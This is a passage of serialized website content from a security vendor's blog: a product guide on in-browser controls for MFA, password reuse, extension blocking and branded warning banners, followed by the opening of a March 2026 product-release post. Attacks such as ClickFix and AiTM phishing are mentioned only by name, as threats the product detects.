it.",{"data":26296,"content":26297,"nodeType":1535},{},[26298],{"data":26299,"content":26300,"nodeType":879},{},[26301,26304,26314],{"data":26302,"marks":26303,"value":21,"nodeType":883},{},[],{"data":26305,"content":26309,"nodeType":18112},{"target":26306},{"sys":26307},{"id":26308,"type":976,"linkType":977},"3ibVBa6u0XfcXXDVtON5th",[26310],{"data":26311,"marks":26312,"value":26313,"nodeType":883},{},[],"Block unwanted or unapproved browser extensions",{"data":26315,"marks":26316,"value":26317,"nodeType":883},{},[]," from being installed, or disable them if they’ve been installed previously.",{"data":26319,"content":26320,"nodeType":879},{},[26321],{"data":26322,"marks":26323,"value":26058,"nodeType":883},{},[],{"data":26325,"content":26326,"nodeType":1036},{},[26327],{"data":26328,"marks":26329,"value":26066,"nodeType":883},{},[26330],{"type":916},{"data":26332,"content":26333,"nodeType":879},{},[26334],{"data":26335,"marks":26336,"value":26337,"nodeType":883},{},[],"Push uses in-browser controls to intervene when a user is missing MFA; reusing a high-value password; using an insecure password; attempting to log in to an unapproved app; or attempting to install a blocked extension. ",{"data":26339,"content":26340,"nodeType":879},{},[26341],{"data":26342,"marks":26343,"value":26344,"nodeType":883},{},[],"Push can block users from reusing passwords set as “protected” (meaning they can’t be reused on any other page or app) or from using unapproved apps or extensions. Push can guide users to update their password or register for MFA on accounts where they lack it. Push can also provide any other specific security or policy guidance to employees via banners that appear on apps in your environment, including GenAI apps. ",{"data":26346,"content":26347,"nodeType":879},{},[26348],{"data":26349,"marks":26350,"value":26351,"nodeType":883},{},[],"For all of these scenarios, you can tune Push controls to your preferred mode (informing vs. blocking, for example) and select which employees, employee groups, and apps or accounts to focus on.",{"data":26353,"content":26354,"nodeType":879},{},[26355],{"data":26356,"marks":26357,"value":26358,"nodeType":883},{},[],"You can also customize the message that employees see, to match your organizational culture and policies.",{"data":26360,"content":26361,"nodeType":1036},{},[26362],{"data":26363,"marks":26364,"value":26366,"nodeType":883},{},[26365],{"type":916},"How it works: ",{"data":26368,"content":26369,"nodeType":879},{},[26370],{"data":26371,"marks":26372,"value":26373,"nodeType":883},{},[],"The Push browser agent observes real-time user behavior and securely analyzes users’ account vulnerabilities in order to identify risks and execute your preconfigured controls. ",{"data":26375,"content":26376,"nodeType":879},{},[26377],{"data":26378,"marks":26379,"value":26380,"nodeType":883},{},[],"To identify MFA status, Push uses the app’s own API to query the logged-in user’s registered MFA methods. To analyze password security, Push creates a salted, truncated hash that is stored locally in the user’s browser and then used for comparison to find reused passwords, leaked passwords, and shared passwords. ",{"data":26382,"content":26383,"nodeType":879},{},[26384,26388,26393,26396,26401],{"data":26385,"marks":26386,"value":26387,"nodeType":883},{},[],"Using the ",{"data":26389,"marks":26390,"value":26392,"nodeType":883},{},[26391],{"type":916},"MFA enforcement",{"data":26394,"marks":26395,"value":3983,"nodeType":883},{},[],{"data":26397,"marks":26398,"value":26400,"nodeType":883},{},[26399],{"type":916},"Strong password enforcement",{"data":26402,"marks":26403,"value":26404,"nodeType":883},{},[]," controls, you can then automatically display a banner to users with those account vulnerabilities, guiding them to fix the issue.",{"data":26406,"content":26410,"nodeType":971},{"target":26407},{"sys":26408},{"id":26409,"type":976,"linkType":977},"7Ka4CumZk9it6GsdlNHREA",[],{"data":26412,"content":26413,"nodeType":879},{},[26414,26418,26423],{"data":26415,"marks":26416,"value":26417,"nodeType":883},{},[],"Using Push’s ",{"data":26419,"marks":26420,"value":26422,"nodeType":883},{},[26421],{"type":916},"Password protection",{"data":26424,"marks":26425,"value":26426,"nodeType":883},{},[]," control, you can select apps where you want to essentially “pin” the high-value password to only that app and prevent its reuse (or phishing) on any other domain. ",{"data":26428,"content":26429,"nodeType":879},{},[26430,26433,26438],{"data":26431,"marks":26432,"value":26417,"nodeType":883},{},[],{"data":26434,"marks":26435,"value":26437,"nodeType":883},{},[26436],{"type":916},"Browser extension blocking",{"data":26439,"marks":26440,"value":26441,"nodeType":883},{},[]," control, you can create a blocklist or allowlist of extensions and prevent users from installing or enabling blocked extensions.",{"data":26443,"content":26444,"nodeType":879},{},[26445,26449,26453],{"data":26446,"marks":26447,"value":26448,"nodeType":883},{},[],"Finally, using Push’s ",{"data":26450,"marks":26451,"value":4439,"nodeType":883},{},[26452],{"type":916},{"data":26454,"marks":26455,"value":26456,"nodeType":883},{},[]," feature, you can add custom messages in a range of modes — from informing to blocking — to apps in use across your business, or even specific URL patterns.",{"data":26458,"content":26462,"nodeType":971},{"target":26459},{"sys":26460},{"id":26461,"type":976,"linkType":977},"5Mq4PEzEhW8p1qLvS9aZMm",[],{"data":26464,"content":26465,"nodeType":1036},{},[26466],{"data":26467,"marks":26468,"value":26470,"nodeType":883},{},[26469],{"type":916},"Your security team gets: ",{"data":26472,"content":26473,"nodeType":879},{},[26474],{"data":26475,"marks":26476,"value":26477,"nodeType":883},{},[],"A flexible and highly configurable set of controls to solve account vulnerabilities at scale and to enforce your security controls around browser extensions and app usage.",{"data":26479,"content":26480,"nodeType":1036},{},[26481],{"data":26482,"marks":26483,"value":26485,"nodeType":883},{},[26484],{"type":916},"Your end-users see: ",{"data":26487,"content":26488,"nodeType":879},{},[26489],{"data":26490,"marks":26491,"value":26492,"nodeType":883},{},[],"Contextual, actionable guidance in the midst of their actual workflow, helping them fix the issue or guiding them to safety.",{"data":26494,"content":26495,"nodeType":905},{},[],{"data":26497,"content":26498,"nodeType":909},{},[26499],{"data":26500,"marks":26501,"value":26503,"nodeType":883},{},[26502],{"type":916},"Implementation tips",{"data":26505,"content":26506,"nodeType":879},{},[26507],{"data":26508,"marks":26509,"value":26510,"nodeType":883},{},[],"Push allows you to set the scope and mode of each control, making it simple to roll out. ",{"data":26512,"content":26513,"nodeType":879},{},[26514,26518,26522,26526,26530,26534,26539],{"data":26515,"marks":26516,"value":26517,"nodeType":883},{},[],"We recommend starting in ",{"data":26519,"marks":26520,"value":4407,"nodeType":883},{},[26521],{"type":916},{"data":26523,"marks":26524,"value":26525,"nodeType":883},{},[]," mode for controls that intervene in end-user activities. That way, you can perform testing with sample malicious sites or scenarios like reused protected passwords, tune out any benign true positives, and develop the messaging you want to use on warn or block pages. (For controls without an explicit monitor mode, like ",{"data":26527,"marks":26528,"value":26400,"nodeType":883},{},[26529],{"type":916},{"data":26531,"marks":26532,"value":26533,"nodeType":883},{},[],", you can still monitor for related events on the ",{"data":26535,"marks":26536,"value":26538,"nodeType":883},{},[26537],{"type":916},"Events",{"data":26540,"marks":26541,"value":26542,"nodeType":883},{},[]," page, such as account security findings, or by consuming webhooks into a downstream tool.)",{"data":26544,"content":26548,"nodeType":971},{"target":26545},{"sys":26546},{"id":26547,"type":976,"linkType":977},"7vk8DHv01cM1o2C0ZpAvZu",[],{"data":26550,"content":26551,"nodeType":879},{},[26552,26556,26560,26563,26567],{"data":26553,"marks":26554,"value":26555,"nodeType":883},{},[],"When you’re ready, set the mode to ",{"data":26557,"marks":26558,"value":4575,"nodeType":883},{},[26559],{"type":916},{"data":26561,"marks":26562,"value":26256,"nodeType":883},{},[],{"data":26564,"marks":26565,"value":4470,"nodeType":883},{},[26566],{"type":916},{"data":26568,"marks":26569,"value":26570,"nodeType":883},{},[]," and use the scope options to perform a phased rollout to your user population by adding additional user groups to the control until you have complete coverage of your population.",{"data":26572,"content":26573,"nodeType":879},{},[26574],{"data":26575,"marks":26576,"value":26577,"nodeType":883},{},[],"By consuming webhook events into your SIEM, you can integrate Push alerts into your existing security workflows, monitoring for new detections or tracking when account vulnerabilities are resolved.",{"data":26579,"content":26580,"nodeType":905},{},[],{"data":26582,"content":26583,"nodeType":909},{},[26584],{"data":26585,"marks":26586,"value":26588,"nodeType":883},{},[26587],{"type":916},"Enhancing user trust with custom branding",{"data":26590,"content":26591,"nodeType":879},{},[26592],{"data":26593,"marks":26594,"value":26595,"nodeType":883},{},[],"We recently released the option to customize the look and feel of all employee-facing banners and block pages. ",{"data":26597,"content":26598,"nodeType":879},{},[26599,26603,26608],{"data":26600,"marks":26601,"value":26602,"nodeType":883},{},[],"From the ",{"data":26604,"marks":26605,"value":26607,"nodeType":883},{},[26606],{"type":916},"Settings",{"data":26609,"marks":26610,"value":26611,"nodeType":883},{},[]," page in the Push admin console, you can upload your logo, add accent colors, and choose from light or dark backgrounds.",{"data":26613,"content":26617,"nodeType":971},{"target":26614},{"sys":26615},{"id":26616,"type":976,"linkType":977},"51lk1VRP20G7H4PAoRZANI",[],{"data":26619,"content":26620,"nodeType":879},{},[26621],{"data":26622,"marks":26623,"value":26624,"nodeType":883},{},[],"Custom branding increases the trustworthiness of these in-the-moment security guardrails so that users recognize them immediately and act on their guidance.",{"data":26626,"content":26627,"nodeType":879},{},[26628],{"data":26629,"marks":26630,"value":26631,"nodeType":883},{},[],"The result: Better compliance and lower friction for you and your employees.",{"data":26633,"content":26634,"nodeType":905},{},[],{"data":26636,"content":26637,"nodeType":909},{},[26638],{"data":26639,"marks":26640,"value":12611,"nodeType":883},{},[26641],{"type":916},{"data":26643,"content":26644,"nodeType":879},{},[26645,26649,26656],{"data":26646,"marks":26647,"value":26648,"nodeType":883},{},[],"Push Security’s browser-based security platform stops browser-based attacks like AiTM phishing, credential stuffing, malicious browser extensions, ClickFix, and session hijacking — ",{"data":26650,"content":26651,"nodeType":940},{"uri":152},[26652],{"data":26653,"marks":26654,"value":26655,"nodeType":883},{},[],"modern attack techniques",{"data":26657,"marks":26658,"value":26659,"nodeType":883},{},[]," that are the leading cause of breaches today.",{"data":26661,"content":26662,"nodeType":879},{},[26663],{"data":26664,"marks":26665,"value":26666,"nodeType":883},{},[],"You don’t need to wait until it all goes wrong either. You can also use Push to proactively find and fix vulnerabilities across the apps that your employees use, like ghost logins, SSO coverage gaps, MFA gaps, vulnerable passwords, and more to harden your attack surface.",{"data":26668,"content":26669,"nodeType":879},{},[26670,26674,26682,26686,26694,26698,26704],{"data":26671,"marks":26672,"value":26673,"nodeType":883},{},[],"Want to learn more about Push? Check out our latest ",{"data":26675,"content":26677,"nodeType":940},{"uri":26676},"\u002Fresources\u002Fproduct-brochure",[26678],{"data":26679,"marks":26680,"value":26681,"nodeType":883},{},[],"product overview",{"data":26683,"marks":26684,"value":26685,"nodeType":883},{},[],", visit our ",{"data":26687,"content":26689,"nodeType":940},{"uri":26688},"\u002Fproduct-demo\u002F",[26690],{"data":26691,"marks":26692,"value":26693,"nodeType":883},{},[],"demo library",{"data":26695,"marks":26696,"value":26697,"nodeType":883},{},[],", or book some time with one of our team for a ",{"data":26699,"content":26700,"nodeType":940},{"uri":19011},[26701],{"data":26702,"marks":26703,"value":6679,"nodeType":883},{},[],{"data":26705,"marks":26706,"value":1350,"nodeType":883},{},[],{"entries":26708},{"inline":26709,"hyperlink":26710,"block":26771},[],[26711,26713,26717,26721,26725,26731,26736,26741,26746,26751,26756,26761,26766],{"sys":26712,"__typename":1967,"title":19039,"slug":19040},{"id":18334},{"sys":26714,"__typename":1967,"title":26715,"slug":26716},{"id":25843},"Push + Network Security: The gap between seeing the packet and securing the session","push-plus-network-security",{"sys":26718,"__typename":1967,"title":26719,"slug":26720},{"id":25864},"Push + Endpoint Security: Extending detection and response to the browser","push-plus-endpoint-security",{"sys":26722,"__typename":1967,"title":26723,"slug":26724},{"id":25878},"Push + Cloud Security: What do you do when bad looks normal?","push-plus-cloud-security",{"sys":26726,"__typename":26727,"title":26728,"slug":26729,"articleId":26730},{"id":25968},"HelpArticle","Can I use Push to detect phishing tools like Evilginx, Modlishka, NakedPages, or Muraena?","can-i-use-push-to-detect-phishing-tools-like-evilnovnc-and-evilginx",10113,{"sys":26732,"__typename":26727,"title":26733,"slug":26734,"articleId":26735},{"id":25991},"How does Push detect cloned login pages?","how-does-push-detect-cloned-login-pages",10117,{"sys":26737,"__typename":26727,"title":26738,"slug":26739,"articleId":26740},{"id":26014},"How does Push detect malicious browser extensions?","how-does-push-detect-malicious-browser-extensions",10148,{"sys":26742,"__typename":26727,"title":26743,"slug":26744,"articleId":26745},{"id":26035},"How does Push detect attacks like ClickFix and FileFix?","how-does-push-detect-attacks-like-clickfix-and-filefix",10141,{"sys":26747,"__typename":26727,"title":26748,"slug":26749,"articleId":26750},{"id":26223},"How does Push protect passwords from being reused or phished?","how-does-push-detect-and-prevent-phishing-attacks",10109,{"sys":26752,"__typename":26727,"title":26753,"slug":26754,"articleId":26755},{"id":26247},"How does MFA enforcement work?","how-does-mfa-enforcement-work",10121,{"sys":26757,"__typename":26727,"title":26758,"slug":26759,"articleId":26760},{"id":26261},"How does strong password enforcement work?","how-does-strong-password-enforcement-work",10129,{"sys":26762,"__typename":26727,"title":26763,"slug":26764,"articleId":26765},{"id":26285},"What can I use the app banner for? Templates and examples","what-can-i-use-the-app-banner-for-templates-and-examples",10106,{"sys":26767,"__typename":26727,"title":26768,"slug":26769,"articleId":26770},{"id":26308},"Can Push detect and disable other installed browser extensions?","can-push-detect-other-installed-browser-extensions",10138,[26772,26808,26813,26832,26840,26865,26903,26906,26914,26922,26930,26938,26946],{"sys":26773,"__typename":1785,"content":26774,"name":26807,"title":59},{"id":25410},{"json":26775},{"nodeType":875,"data":26776,"content":26777},{},[26778],{"nodeType":879,"data":26779,"content":26780},{},[26781,26784,26792,26796,26803],{"nodeType":883,"value":21,"marks":26782,"data":26783},[],{},{"nodeType":940,"data":26785,"content":26787},{"uri":26786},"https:\u002F\u002Fwww.crowdstrike.com\u002Fexplore\u002F2026-global-threat-report?utm_medium=dir",[26788],{"nodeType":883,"value":26789,"marks":26790,"data":26791},"Crowdstrike reports",[],{},{"nodeType":883,"value":26793,"marks":26794,"data":26795}," that valid account abuse accounted for 35% of incidents in 2025, while ",[],{},{"nodeType":940,"data":26797,"content":26798},{"uri":1421},[26799],{"nodeType":883,"value":26800,"marks":26801,"data":26802},"Verizon reports",[],{},{"nodeType":883,"value":26804,"marks":26805,"data":26806}," that identity is now the primary breach vector observed across all methods.",[],{},"Guide: Protecting Users IB 1",{"sys":26809,"__typename":6000,"title":26810,"arcadeDemoUrl":26811,"playText":26812},{"id":25437},"Custom branding for Push controls","https:\u002F\u002Fdemo.arcade.software\u002FkBqjoJqArDTsUtB6HHwR?embed","2 mins",{"sys":26814,"__typename":1785,"content":26815,"name":26831,"title":59},{"id":25461},{"json":26816},{"nodeType":875,"data":26817,"content":26818},{},[26819],{"nodeType":879,"data":26820,"content":26821},{},[26822,26826],{"nodeType":883,"value":26823,"marks":26824,"data":26825},"It's harder than ever to identify malicious scenarios when browsing the web as part of your routine, daily activities — and the list of attacks to be aware of is growing every day. ",[],{},{"nodeType":883,"value":26827,"marks":26828,"data":26830},"It was hard enough to train users not to click links in emails when that was pretty much the only thing they had to watch out for.  ",[26829],{"type":916},{},"Guide: Protecting Users IB 3",{"sys":26833,"__typename":1765,"title":26834,"caption":26835,"layoutMode":59,"file":26836},{"id":25467},"Don't make employees the weak link image - blog - custom branding","It's harder than ever for users to identify malicious content on the web, with attackers abusing an ever-increasing list of actions that feel pretty normal to users, with a wide range of malicious payloads.",{"url":26837,"width":26838,"height":26839},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F2aSm6QBWDOU6JBtOLfyp6R\u002Fd63cacab198ef9b325cbcfdbe0373b5a\u002FBrowser_Attacks_Targeting_Users__1_.png",4046,2160,{"sys":26841,"__typename":1785,"content":26842,"name":26864,"title":59},{"id":25749},{"json":26843},{"nodeType":875,"data":26844,"content":26845},{},[26846],{"nodeType":879,"data":26847,"content":26848},{},[26849,26853,26860],{"nodeType":883,"value":26850,"marks":26851,"data":26852},"Learn more about the browser-based attack techniques driving the biggest breaches of the last year in our ",[],{},{"nodeType":940,"data":26854,"content":26855},{"uri":152},[26856],{"nodeType":883,"value":26857,"marks":26858,"data":26859},"2026 Browser Attack Techniques",[],{},{"nodeType":883,"value":26861,"marks":26862,"data":26863}," ebook.",[],{},"Browser attack techniques ebook callout",{"sys":26866,"__typename":1785,"content":26867,"name":26902,"title":59},{"id":25892},{"json":26868},{"nodeType":875,"data":26869,"content":26870},{},[26871],{"nodeType":879,"data":26872,"content":26873},{},[26874,26878,26887,26891,26898],{"nodeType":883,"value":26875,"marks":26876,"data":26877},"The Push research team has written extensively about how cloud-first operators like ",[],{},{"nodeType":18112,"data":26879,"content":26883},{"target":26880},{"sys":26881},{"id":26882,"type":976,"linkType":977},"2sFCww9xnI8okIxhtOaiY1",[26884],{"nodeType":883,"value":2006,"marks":26885,"data":26886},[],{},{"nodeType":883,"value":26888,"marks":26889,"data":26890}," use a variety of methods to ",[],{},{"nodeType":940,"data":26892,"content":26893},{"uri":8582},[26894],{"nodeType":883,"value":26895,"marks":26896,"data":26897},"evade existing security controls",[],{},{"nodeType":883,"value":26899,"marks":26900,"data":26901},", if you’d like to dig into the details.",[],{},"Guide: Protecting Users IB 2",{"sys":26904,"__typename":1765,"title":19112,"caption":19113,"layoutMode":59,"file":26905},{"id":18425},{"url":19115,"width":1781,"height":19116},{"sys":26907,"__typename":1765,"title":26908,"caption":26909,"layoutMode":59,"file":26910},{"id":26126},"Sample ClickFix detection - blog article - custom branding","Sample screenshot captured from a malicious copy-paste attack",{"url":26911,"width":26912,"height":26913},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F3xaJZGyhSbqqLZ7iyiqb40\u002F427c9eeb7312dc1d85d57b10b2ffec11\u002Fclickfix_screenshot_example.png",947,244,{"sys":26915,"__typename":1765,"title":26916,"caption":26917,"layoutMode":59,"file":26918},{"id":26180},"Sample phishing block page - blog article - custom branding","Sample phishing block page with custom branding",{"url":26919,"width":26920,"height":26921},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F2eQNuARuzPujGm1tfYxFhf\u002F1ebce9e33cf89368d1e9ce9104382641\u002Fphishing_block_page_branded.png",1274,719,{"sys":26923,"__typename":1765,"title":26924,"caption":26925,"layoutMode":59,"file":26926},{"id":26409},"MFA enforcement banner example - blog article - custom branding","MFA enforcement banner with custom branding and dark theme option",{"url":26927,"width":26928,"height":26929},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F8srMEvq3vFJQiEyIaESDw\u002Ffdff9a4f3bd0eadb5f58ff9fac4ada74\u002FMFA_enforcement_banner_branded_sample.png",1472,756,{"sys":26931,"__typename":1765,"title":26932,"caption":26933,"layoutMode":59,"file":26934},{"id":26461},"Sample blocking banner - blog article - custom branding","Sample blocking banner",{"url":26935,"width":26936,"height":26937},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F2b3bGaN3vQBXn5SL8BlbzZ\u002Ffbe21cc6e6387856e2d3a56ffb6a1e82\u002Fbanner_example_branded_block.png",1304,812,{"sys":26939,"__typename":1765,"title":26940,"caption":26941,"layoutMode":59,"file":26942},{"id":26547},"Rule configuration example - blog article - custom branding","Rule configuration slideout for Phishing tool detection",{"url":26943,"width":26944,"height":26945},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F2O0ptkRr7E0QPlfABl3zq9\u002F1e2204b441b50129f543177a99c46fa6\u002Fconfig_rule_scope_mode_example.png",739,820,{"sys":26947,"__typename":1765,"title":26948,"caption":26949,"layoutMode":59,"file":26950},{"id":26616},"Branding settings - blog article - custom branding","Branding configuration options for banners and block pages",{"url":26951,"width":26952,"height":26953},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F4EX3DqVhvOMCyNFYSBJ1rF\u002Fcaabcddde02e65e363f2354aa7ab2be0\u002Fbranding_settings.png",995,817,{"items":26955},[],{},"Guide: How to use Push to protect users from browser threats","guide","2026-04-08T00:00:00.000Z",{"items":26961},[],"guide-how-to-use-push-controls-to-protect-your-users-from-modern-attacks","blog\u002Fguide-how-to-use-push-controls-to-protect-your-users-from-modern-attacks",{"json":26965},{"data":26966,"content":26967,"nodeType":875},{},[26968],{"data":26969,"content":26970,"nodeType":879},{},[26971],{"data":26972,"marks":26973,"value":26974,"nodeType":883},{},[],"If you want to protect employees working in the browser, you need to get as close to the user as possible. In this Push product guide, we’ll cover how to use in-browser controls to stop attacks before compromise can occur, and to guide users to remediate vulnerabilities — all using your custom branding to increase trust.","How to use in-browser controls to stop browser-based attacks before compromise can occur",{"id":26977,"publishedAt":26978},"wI3paLVDlEKdaRI5qMYFc","2026-08-12T11:53:00.921Z",{"items":26980},[26981,26983],{"sys":26982,"name":3273},{"id":3272},{"sys":26984,"name":343},{"id":3276},{"items":26986},[26987,26989,26991,26993,26995,26997,26999,27001,27003,27005,27007,27009,27011,27013,27015,27017,27019,27021],{"sys":26988,"name":280,"slug":281,"tier":31},{"id":277},{"sys":26990,"name":298,"slug":299,"tier":31},{"id":295},{"sys":26992,"name":521,"slug":522,"tier":31},{"id":518},{"sys":26994,"name":343,"slug":344,"tier":31},{"id":340},{"sys":26996,"name":415,"slug":416,"tier":31},{"id":412},{"sys":26998,"name":262,"slug":263,"tier":45},{"id":259},{"sys":27000,"name":316,"slug":317,"tier":45},{"id":313},{"sys":27002,"name":325,"slug":326,"tier":45},{"id":322},{"sys":27004,"name":459,"slug":460,"tier":45},{"id":456},{"sys":27006,"name":468,"slug":469,"tier":45},{"id":465},{"sys":27008,"name":503,"slug":504,"tier":45},{"id":500},{"sys":27010,"name":289,"slug":290,"tier":45},{"id":286},{"sys":27012,"name":607,"slug":608,"tier":45},{"id":604},{"sys":27014,"name":450,"slug":451,"tier":45},{"id":447},{"sys":27016,"name":591,"slug":592,"tier":45},{"id":588},{"sys":27018,"name":582,"slug":583,"tier":45},{"id":579},{"sys":27020,"name":352,"slug":353,"tier":45},{"id":349},{"sys":27022,"name":599,"slug":600,"tier":45},{"id":596},"r6A4hwgdXf1AftoB3nqlkUp1HAEfQHUQeYO8ACKCPuA",{"id":27025,"title":27026,"authorsCollection":27027,"content":27035,"extension":228,"faqItemsCollection":27577,"faqTitle":59,"featured":6,"hashTags":59,"meta":27579,"metaTitle":27580,"ogImage":59,"postType":27581,"publishedDate":27582,"relatedBlogPostsCollection":27583,"slug":28303,"stem":28304,"subtitle":59,"summary":28305,"synopsis":28316,"sys":28317,"tagsCollection":28320,"topicsCollection":28324,"__hash__":28334},"blog\u002Fblog\u002Fproduct-release-march-2026.json","Product release: March 2026",{"items":27028},[27029],{"fullName":27030,"firstName":27031,"jobTitle":27032,"socialLinks":59,"profilePicture":27033},"Andy Waugh","Andy","VP Product",{"url":27034},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F3Rf76rJn6S9inMb4dUnAIJ\u002F0a787f8141d05b95300e2fe77c4493fa\u002FDSC_6868.jpg",{"json":27036,"links":27530},{"data":27037,"content":27038,"nodeType":875},{},[27039,27046,27109,27116,27123,27139,27155,27161,27178,27184,27199,27206,27212,27229,27235,27256,27289,27306,27312,27319,27334,27340,27358,27364,27371,27394,27419,27437,27444,27451,27524],{"data":27040,"content":27041,"nodeType":909},{},[27042],{"data":27043,"marks":27044,"value":27045,"nodeType":883},{},[],"What's new this month:",{"data":27047,"content":27048,"nodeType":1531},{},[27049,27059,27069,27079,27089,27099],{"data":27050,"content":27051,"nodeType":1535},{},[27052],{"data":27053,"content":27054,"nodeType":879},{},[27055],{"data":27056,"marks":27057,"value":27058,"nodeType":883},{},[],"Detect malicious browser extensions",{"data":27060,"content":27061,"nodeType":1535},{},[27062],{"data":27063,"content":27064,"nodeType":879},{},[27065],{"data":27066,"marks":27067,"value":27068,"nodeType":883},{},[],"Create a blocklist or allowlist for browser extensions",{"data":27070,"content":27071,"nodeType":1535},{},[27072],{"data":27073,"content":27074,"nodeType":879},{},[27075],{"data":27076,"marks":27077,"value":27078,"nodeType":883},{},[],"Block ClickFix-style attacks and collect payloads for investigation",{"data":27080,"content":27081,"nodeType":1535},{},[27082],{"data":27083,"content":27084,"nodeType":879},{},[27085],{"data":27086,"marks":27087,"value":27088,"nodeType":883},{},[],"Custom branding for employee-facing banners and block pages",{"data":27090,"content":27091,"nodeType":1535},{},[27092],{"data":27093,"content":27094,"nodeType":879},{},[27095],{"data":27096,"marks":27097,"value":27098,"nodeType":883},{},[],"Collect additional metadata to support threat detection",{"data":27100,"content":27101,"nodeType":1535},{},[27102],{"data":27103,"content":27104,"nodeType":879},{},[27105],{"data":27106,"marks":27107,"value":27108,"nodeType":883},{},[],"And a few other things … ",{"data":27110,"content":27111,"nodeType":909},{},[27112],{"data":27113,"marks":27114,"value":27115,"nodeType":883},{},[],"Detect malicious extensions",{"data":27117,"content":27118,"nodeType":879},{},[27119],{"data":27120,"marks":27121,"value":27122,"nodeType":883},{},[],"Push can now detect and block malicious browser extensions found in your environment. ",{"data":27124,"content":27125,"nodeType":879},{},[27126,27130,27135],{"data":27127,"marks":27128,"value":27129,"nodeType":883},{},[],"Push maintains a global list of malicious extensions based on our own threat research and publicly available threat intelligence. When an extension in your environment matches a malicious extension ID, Push will raise a detection on the ",{"data":27131,"marks":27132,"value":27134,"nodeType":883},{},[27133],{"type":916},"Detections",{"data":27136,"marks":27137,"value":27138,"nodeType":883},{},[]," page of the Push admin console. You can also configure the control to warn or block users automatically.",{"data":27140,"content":27141,"nodeType":879},{},[27142,27146,27151],{"data":27143,"marks":27144,"value":27145,"nodeType":883},{},[],"To enable malicious extension detection, go to the ",{"data":27147,"marks":27148,"value":27150,"nodeType":883},{},[27149],{"type":916},"Controls",{"data":27152,"marks":27153,"value":27154,"nodeType":883},{},[]," page in the Push admin console. ",{"data":27156,"content":27160,"nodeType":971},{"target":27157},{"sys":27158},{"id":27159,"type":976,"linkType":977},"1QV5UQ04MYLpWY7jTocvO4",[],{"data":27162,"content":27163,"nodeType":879},{},[27164,27167,27175],{"data":27165,"marks":27166,"value":21,"nodeType":883},{},[],{"data":27168,"content":27171,"nodeType":18112},{"target":27169},{"sys":27170},{"id":26014,"type":976,"linkType":977},[27172],{"data":27173,"marks":27174,"value":18990,"nodeType":883},{},[],{"data":27176,"marks":27177,"value":21,"nodeType":883},{},[],{"data":27179,"content":27180,"nodeType":909},{},[27181],{"data":27182,"marks":27183,"value":27068,"nodeType":883},{},[],{"data":27185,"content":27186,"nodeType":879},{},[27187,27191,27195],{"data":27188,"marks":27189,"value":27190,"nodeType":883},{},[],"You can also block unwanted extensions or allowlist only the extensions you want in your environment, using Push’s ",{"data":27192,"marks":27193,"value":26437,"nodeType":883},{},[27194],{"type":916},{"data":27196,"marks":27197,"value":27198,"nodeType":883},{},[]," control.",{"data":27200,"content":27201,"nodeType":879},{},[27202],{"data":27203,"marks":27204,"value":27205,"nodeType":883},{},[],"End-users will see a block page if they attempt to enable a blocked extension or install one via the Chrome or Microsoft extension stores.",{"data":27207,"content":27211,"nodeType":971},{"target":27208},{"sys":27209},{"id":27210,"type":976,"linkType":977},"3OCdGfsyNTLXQx77dwzY9L",[],{"data":27213,"content":27214,"nodeType":879},{},[27215,27218,27226],{"data":27216,"marks":27217,"value":21,"nodeType":883},{},[],{"data":27219,"content":27222,"nodeType":18112},{"target":27220},{"sys":27221},{"id":26308,"type":976,"linkType":977},[27223],{"data":27224,"marks":27225,"value":18990,"nodeType":883},{},[],{"data":27227,"marks":27228,"value":21,"nodeType":883},{},[],{"data":27230,"content":27231,"nodeType":909},{},[27232],{"data":27233,"marks":27234,"value":27078,"nodeType":883},{},[],{"data":27236,"content":27237,"nodeType":879},{},[27238,27242,27252],{"data":27239,"marks":27240,"value":27241,"nodeType":883},{},[],"You can now block ClickFix-style malicious copy and paste attacks using Push. These are one of the ",{"data":27243,"content":27247,"nodeType":18112},{"target":27244},{"sys":27245},{"id":27246,"type":976,"linkType":977},"1u8RJxC00HbBhCBVxcDnkK",[27248],{"data":27249,"marks":27250,"value":27251,"nodeType":883},{},[],"fastest-growing",{"data":27253,"marks":27254,"value":27255,"nodeType":883},{},[]," browser-based attacks. You can also choose to collect the payload for your security team to investigate.",{"data":27257,"content":27258,"nodeType":879},{},[27259,27263,27268,27272,27277,27280,27285],{"data":27260,"marks":27261,"value":27262,"nodeType":883},{},[],"From the Push admin console, go to ",{"data":27264,"marks":27265,"value":27267,"nodeType":883},{},[27266],{"type":916},"Controls > Malicious copy and paste detection",{"data":27269,"marks":27270,"value":27271,"nodeType":883},{},[],". Then create a configuration rule to select the ",{"data":27273,"marks":27274,"value":27276,"nodeType":883},{},[27275],{"type":916},"Mode",{"data":27278,"marks":27279,"value":3983,"nodeType":883},{},[],{"data":27281,"marks":27282,"value":27284,"nodeType":883},{},[27283],{"type":916},"Scope",{"data":27286,"marks":27287,"value":27288,"nodeType":883},{},[],". If you’ve enabled payload collection, Push will collect the malicious payload and include it in the detection event.",{"data":27290,"content":27291,"nodeType":879},{},[27292,27295,27303],{"data":27293,"marks":27294,"value":21,"nodeType":883},{},[],{"data":27296,"content":27299,"nodeType":18112},{"target":27297},{"sys":27298},{"id":26035,"type":976,"linkType":977},[27300],{"data":27301,"marks":27302,"value":18990,"nodeType":883},{},[],{"data":27304,"marks":27305,"value":21,"nodeType":883},{},[],{"data":27307,"content":27308,"nodeType":909},{},[27309],{"data":27310,"marks":27311,"value":27088,"nodeType":883},{},[],{"data":27313,"content":27314,"nodeType":879},{},[27315],{"data":27316,"marks":27317,"value":27318,"nodeType":883},{},[],"Customize the look and feel of employee-facing banners and warn or block pages by adding your company logo, accent color, and choice of light or dark mode themes. ",{"data":27320,"content":27321,"nodeType":879},{},[27322,27326,27331],{"data":27323,"marks":27324,"value":27325,"nodeType":883},{},[],"To add your brand elements, go to ",{"data":27327,"marks":27328,"value":27330,"nodeType":883},{},[27329],{"type":916},"Settings > 